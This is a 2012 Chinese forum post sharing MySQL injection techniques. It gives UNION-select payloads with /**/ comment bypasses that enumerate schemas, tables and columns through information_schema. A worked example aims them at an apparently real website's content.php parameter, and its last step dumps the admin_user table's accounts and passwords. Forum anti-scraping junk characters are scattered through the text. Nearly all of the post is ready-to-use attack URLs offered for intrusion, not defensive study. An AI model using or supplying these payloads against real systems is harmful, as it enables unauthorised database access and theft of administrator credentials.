找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2084|回复: 0
打印 上一主题 下一主题

mysql注入技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:29:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
查库
; o$ s9 v) B' p, l- w" v2 H4 h% H% p  _" t3 v
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*" \7 D1 S' I' d, @( S+ C
0 K2 x# K, q+ K, u3 W
查表8 A, p$ d1 _" L$ U! e9 j& n
( K# |- v9 f9 Y$ W2 n  G% Y0 h# P' V
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
+ E9 H* Y& A! S9 z7 d- z( c/ o( N1 o% o
查段
1 x4 g* e& a$ M- I. ]! g1 T9 }# L# ]
- ?1 p2 @' z0 J8 }" d! ~% w+ Fid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
/ |4 C: J1 N! N$ x. k' r8 Y3 N) @5 S$ x- J/ K- m
  G6 y- ~( O5 ^
mysql5高级注入方法暴表9 O" A' |' n! U6 |- Z4 \* @4 a9 {; \

3 ]+ W4 g9 X$ q5 e例子如下:
% |# ?' g/ V* G8 p1 B! ?
0 ~1 X3 v+ x( E6 S1.爆表7 n' M+ i& w8 X6 B- F/ a1 f' J
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
. U, a& ]3 \3 {: {8 {; V4 x# r% ]3 r这样爆到第4个时出现了admin_user表。
+ x( f2 o& e! m' L/ {  ^6 p6 D' z7 S
2.暴字段' |9 h! Q9 g0 }
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*: ]; {: Y% {; p; G' Z
+ U5 f( }5 l; h

, V( a# E" {* J1 D3.爆密码& t: \# }+ O( h( o& X  Y
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* # D5 ~3 C; \! g3 h7 d

5 z* {- `' u3 j" a6 v: w' J8 C+ X/ l' E' x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表